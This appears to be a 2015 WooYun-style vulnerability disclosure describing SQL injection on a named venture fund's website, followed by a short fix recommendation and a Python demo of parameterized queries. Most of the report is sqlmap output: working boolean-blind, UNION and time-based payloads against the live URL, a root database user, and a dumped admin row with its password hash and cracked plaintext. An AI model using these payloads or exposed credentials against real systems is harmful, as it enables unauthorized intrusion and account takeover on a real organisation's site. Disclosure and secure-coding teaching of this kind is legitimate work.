SQL injection on a ZhenFund (真格基金) page

2015-09-04 02:55

ZhenFund main site, SQL injection

http://www.zhenfund.com/Home/Index/category/id/4

Code:
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND 1240=1240 AND (9452=9452

Type: UNION query
Title: MySQL UNION query (NULL) - 14 columns
Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71796f6971,0x5a6b57744f626f4c544d,0x716f6f7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND SLEEP(5) AND (8248=8248
---
[13:46:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.11
[13:46:07] [INFO] fetching current user
current user: 'root@localhost'

Code:
Database: lfm_zgjj
Table: zgjj_admin
[1 entry]
+---------+--------------+------+---------+----------+----------------------------------+------------+
| adminId | createUserId | role | useFlag | username | password                         | createTime |
+---------+--------------+------+---------+----------+----------------------------------+------------+
| 1       | 1            | 4    | 1       | admin    | c4ca4238a0b923820dcc509a6f75849b | 1427267282 |
+---------+--------------+------+---------+----------+----------------------------------+------------+

The password turns out to be just "1".


Fix recommendation:

Filter the input.

Check the other parameters as well.
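To make the recommended fix concrete, here is an added example (not part of the original report) contrasting the query shape the sqlmap payload implies with a hardened version. The category table, the SQLite in-memory engine standing in for the site's MySQL backend, and the false-condition payload are constructed assumptions; the true-condition payload is the one from the sqlmap output above.

```python
import sqlite3

# Constructed stand-in for the site's category lookup. The page shows only
# the admin table, so this schema and the SQLite engine (in place of the
# MySQL backend sqlmap identified) are assumptions for the demonstration.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE category (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO category VALUES (4, 'portfolio'), (5, 'news');
    """)
    return conn

def category_vulnerable(conn, raw_id):
    # Query shape inferred from the payload: "4) AND ... AND (9452=9452"
    # only parses if the id was spliced into the SQL text inside parentheses.
    sql = f"SELECT id, name FROM category WHERE (id = {raw_id})"
    return conn.execute(sql).fetchall()

def category_fixed(conn, raw_id):
    # Type-check first: a category id is a plain non-negative integer.
    if not raw_id.isdigit():
        raise ValueError("invalid category id")
    # Pass the value as a bound parameter; it never becomes SQL text.
    sql = "SELECT id, name FROM category WHERE (id = ?)"
    return conn.execute(sql, (int(raw_id),)).fetchall()

# Boolean-based blind payload from the sqlmap output on the page, plus a
# constructed false-condition variant to show why the response differs.
TRUE_PAYLOAD = "4) AND 1240=1240 AND (9452=9452"
FALSE_PAYLOAD = "4) AND 1240=1241 AND (9452=9452"

def demo():
    conn = make_db()
    result = {
        "vuln_true": category_vulnerable(conn, TRUE_PAYLOAD),    # row comes back
        "vuln_false": category_vulnerable(conn, FALSE_PAYLOAD),  # empty result
        "fixed_ok": category_fixed(conn, "4"),                   # normal request
    }
    try:
        category_fixed(conn, TRUE_PAYLOAD)
        result["fixed_rejected"] = False
    except ValueError:
        result["fixed_rejected"] = True  # payload never reaches the database
    return result

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The differing result sets for the two payloads are exactly the signal a boolean-based blind probe relies on; the bound-parameter version returns the same row for a legitimate id and rejects anything that is not an integer.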

Source: www.wooyun.org/bugs/wooyun-2015-0127853

Reads: 75082 | Comments: 0 | Tags: injection
